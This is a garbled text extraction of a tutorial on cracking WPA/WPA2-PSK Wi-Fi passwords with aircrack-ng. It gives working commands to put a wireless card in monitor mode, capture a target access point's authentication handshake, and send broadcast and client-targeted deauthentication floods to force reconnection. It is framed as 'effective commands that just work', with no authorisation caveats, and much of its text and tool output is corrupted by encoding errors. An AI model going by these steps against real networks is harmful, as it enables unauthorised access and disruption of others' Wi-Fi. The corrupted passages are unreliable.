Crack Wi-Fi With WPA_WPA2-PSK Using Aircrack-ng
Transcript of Crack Wi-Fi With WPA_WPA2-PSK Using Aircrack-ng
-
8/12/2019 Crack Wi-Fi With WPA_WPA2-PSK Using Aircrack-ng
1/5
Crack Wi-Fi with WPA/WPA2-PSKusing Aircrack-ng
This article is a summary of effective commands that just work.
With the help a these commands you will be able to crack WPA/WPA2 Wi- i AccessPointswhich use P!" #Pre-!hared "ey$ encryption.
The objective is to capture the WPA/WPA2 authentication handshake and then crack theP!" usin% aircrack-ng .
The full tutorial about WPA/WPA2 crackin% can be found here .
&ere are the basic steps we will be %oin% throu%h'
(. )nstall the latest aircrack-ng *. !tart the wireless interface in monitor mode usin% airmon-ng 2. !tart airodump-ng on AP channel with filter for +!!), to collect authentication
handshake . ptional0 1se aireplay-ng to deauthenticate the wireless client . 3un aircrack-ng to crack the WPA/WPA2-P!" usin% the authentication handshake
0. Install the Latest Aircrack-ng)nstall the re4uired dependencies '
$ sudo apt-get install build-essential libssl-dev pkg-config
,ownload and install the latest aircrack-n% '
$ wget http://download.aircrack-ng.org/aircrack-ng-1.2-beta3.tar.gz
$ cd aircrack-ng-1.2-beta3
$ sudo make
$ sudo make install
+e sure to check that the version of aircrack-ng is up-to-date because you may seeproblems with older versions.
$ aircrack - ng -- help head - 3
!ircrack - ng 1.2 beta3 r23"3 - # % 2&&' - 2&13 (homas d )*treppe http://www.aircrack-ng.org
http://www.aircrack-ng.org/doku.php?id=cracking_wpahttp://www.aircrack-ng.org/doku.php?id=install_aircrackhttp://www.aircrack-ng.org/doku.php?id=install_aircrackhttp://www.aircrack-ng.org/doku.php?id=cracking_wpa -
8/12/2019 Crack Wi-Fi With WPA_WPA2-PSK Using Aircrack-ng
2/5
1. Start the Wireless Interface in !nit!r !"eind and stop all processes that could cause trouble '
$ sudo airmon-ng check kill
!tart the wireless interface in monitor mode '
$ sudo airmon-ng start wlan&
5otice that airmon-ng enabled monitor-mode on mon( '
+nterface hipset ,river
wlan& +ntel '23 iwlwifi - ph &0
#monitor mode enabled on mon& %
!o6 the correct interface name to use in later parts of the tutorial is mon(.
2. Start Air!"u#$-ng t! C!llect Authenticati!n%an"shake&!w' when !ur wireless a"a$ter is in #!nit!r #!"e' we ha(e the ca$a)ilit* t!see all the wireless traffic that $asses )* in the air.
)t can be done with airodump-ng command '$ sudo airodump-ng mon&
All of the visible APs are listed in the upper part of the screen and the clients are listed inthe lower part of the screen '
1 0 lapsed : 2& s 0 2&1 - & - 2" 12 : '
455+, 678 4eacons 9,ata 9/s ;4 < +6 8 !=( 55+,
&&: 11 : 22 : 33 : : - > 212 1 3' '' 1 e 76!2 ;6 65?rack;e
'' : @@: >>: "" : &&: 11 - ' 13 3 3 1 e 76!2 ;6 65? 5ome!6
455+, 5(!(+*< 678 8ate Aost Brames 6robe
&&: 11 : 22 : 33 : : !! : 44 : : ,, : : BB - & - 1 11 '&&: 11 : 22 : 33 : : CC : : ++: DD: ?? : AA - @> & - 1 & 1'' : @@: >>: "" : &&: 11 ;; :
-
8/12/2019 Crack Wi-Fi With WPA_WPA2-PSK Using Aircrack-ng
3/5
5ow start airodump-ng on AP channel with filter for +!!), to collect authenticationhandshake for the access point we are interested in '
7 sudo airodump-n% -c * --bssid (('**'22' ' '88 -w WPAcrack mon( 9i%nore-ne%ative-one
+$ti!n ,escri$ti!n-c The channel for the wireless network
--bssid The :A; address of the access point
-w The file name prefi< for the file which will containauthentication handshake
mon( The wireless interface
--i%nore-ne%ative-
one3emoves =fi if you want toforce this process.
After some time you=ll notice the in the top ri%ht-hand corner of the screen.
This means airodump-ng has successfully captured the handshake.
1 0 lapsed : 2& s 0 2&1 - & - 2" 12 : ' 76! handshake : &&: 11 : 22 : 33 : :
455+, 678 4eacons 9,ata 9/s ;4 < +6 8 !=( 55+,
&&: 11 : 22 : 33 : : - > 212 1 3' '' 1 e 76!2 ;6 65?rack;e
455+, 5(!(+*< 678 8ate Aost Brames 6robe
&&: 11 : 22 : 33 : : !! : 44 : : ,, : : BB - & - 1 11 '
. +$ti!nal se Aire$la*-ng t!
,eauthenticate the Wireless ClientThis step is optional. )f you can=t wait till airodump-ng captures a handshake6 you cansend a messa%e to the wireless client sayin% that it is no lon%er associated with the AP.The wireless client will then hopefully reauthenticate with the AP and we=ll capture theauthentication handshake.
!end ,eAuth to broadcast '
$ sudo airepla -ng --deauth 1&& -a &&:11:22:33: : mon& --ignore-negative-one
-
8/12/2019 Crack Wi-Fi With WPA_WPA2-PSK Using Aircrack-ng
4/5
!end directed ,eAuth #attack is more effective when it is tar%eted$ '
$ sudo airepla -ng --deauth 1&& -a &&:11:22:33: : -c !!:44: :,,: :BB mon& --ignore-
negative-one
+$ti!n ,escri$ti!n--deauth *(( The number of de-authenticate frames you want tosend #( for unlimited$
-a The :A; address of the access point
-c The :A; address of the client
mon( The wireless interface
--i%nore-ne%ative-one 3emoves =fi && "3 ! > ,, & @@ !3 !1 @, 1 ,
(ransient ?e : 3! 3 2@ >' 3 &1 !> "1 ! 2, @ "@ @1 ,2 B>!! &3 > "" 4B !@ 32 4 2B , "3 & 4 4 B',4 !3 @ 3 '2 B 11 3 ' ,! 4! 3> 2" @2 , 4"!3 11 @ !' >B "& '3 ' 14 &3 >" @2 @" "" 21 43
!6*A ;! : "B 4 B 4" 3 >4 ! ,B !& 3 B , ", B 1' '2
http://www.insidepro.com/dictionaries.phphttp://www.insidepro.com/dictionaries.php -
8/12/2019 Crack Wi-Fi With WPA_WPA2-PSK Using Aircrack-ng
5/5